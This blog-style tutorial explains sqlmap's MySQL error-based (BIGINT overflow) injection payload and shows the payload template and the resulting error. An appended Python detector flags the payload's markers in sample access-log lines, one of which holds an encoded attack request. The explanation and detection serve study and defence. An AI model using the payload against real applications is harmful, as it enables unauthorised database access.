Published: 13 Sept 2018 › Updated: 13 Sept 2018
SQLMAP Part 1
First, a flowchart drawn by a more experienced author (image):
Hmm... this article only covers one injection technique I used: error-based injection.
Error-based injection is also known as DOUBLE QUERY INJECTION, i.e. double-query injection.
Error-based tests - WHERE or HAVING clause
The payload is as follows:
AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
In it,
SELECT (ELT([RANDNUM]=[RANDNUM],1))
returns NULL, as shown here:
SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x')
The ELT() function is used as follows; this diagram explains it well (image):
The CONCAT() function works like this:
mysql> SELECT CONCAT('My', 'S', 'QL');
-> 'MySQL'
The if() function is used as follows:
if(expr1,expr2,expr3)
If expr1 is TRUE, if() returns expr2; otherwise it returns expr3.
The return value of if() is numeric or a string, depending on the context in which it is used.
As for why an error is raised, just run the following command in MySQL and it becomes clear:
select 3 * 8446744073709551610;
mysql> select 3 * 8446744073709551610;
ERROR 1690 (22003): BIGINT value is out of range in '(3 * 8446744073709551610)'
mysql>
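As an added defender-side example (not part of the original post): a Python script that flags the building blocks of the payload template above (ELT(), CONCAT(), IF(), the 2*( multiplier and the overflow constant) in URL-encoded access-log lines, and recognises the MySQL error 1690 text when it is echoed in a response body. The log lines are constructed for the example and the function names are the example's own, not sqlmap's.

```python
import re
from urllib.parse import unquote_plus

# Markers of the BIGINT-overflow error-based payload template shown above:
# ELT(), CONCAT(), IF(), the "2*(" multiplier and the overflow constant.
OVERFLOW_CONSTANT = "8446744073709551610"
PAYLOAD_MARKERS = [
    re.compile(r"\bELT\s*\(", re.I),
    re.compile(r"\bCONCAT\s*\(", re.I),
    re.compile(r"\bIF\s*\(", re.I),
    re.compile(r"\b\d+\s*\*\s*\("),           # e.g. "2*(" in the payload
    re.compile(re.escape(OVERFLOW_CONSTANT)),
]
# MySQL error 1690; seeing it in a response body means DB errors leak to clients.
ERROR_SIGNATURE = re.compile(r"BIGINT( UNSIGNED)? value is out of range", re.I)

def decode_request(raw: str, rounds: int = 3) -> str:
    """URL-decode up to `rounds` times so double-encoded payloads are still seen."""
    current = raw
    for _ in range(rounds):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current

def marker_score(raw: str) -> int:
    """Count how many payload markers appear in the decoded request line."""
    decoded = decode_request(raw)
    return sum(1 for marker in PAYLOAD_MARKERS if marker.search(decoded))

def flag_probes(log_lines, threshold: int = 4):
    """Return indexes of log lines that look like this error-based probe."""
    return [i for i, line in enumerate(log_lines) if marker_score(line) >= threshold]

def response_leaks_error(body: str) -> bool:
    """True if an HTTP response body echoes the MySQL BIGINT overflow error."""
    return ERROR_SIGNATURE.search(body) is not None

# Constructed sample access-log lines (not captured from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Sep/2018:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [13/Sep/2018:10:00:02 +0000] "GET /item.php?id=1%20AND%20(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT(%27qq%27,(SELECT%20(ELT(1234=1234,1))),%27qq%27,%27x%27))s),%208446744073709551610,%208446744073709551610))) HTTP/1.1" 500 231',
    '10.0.0.9 - - [13/Sep/2018:10:00:03 +0000] "GET /search.php?q=concat+if+elt HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for i in flag_probes(SAMPLE_LOG):
        print(f"line {i}: score {marker_score(SAMPLE_LOG[i])}")
```

The threshold keeps a single function name such as "concat" in a normal search query from being flagged; only the combination used by the payload scores high enough.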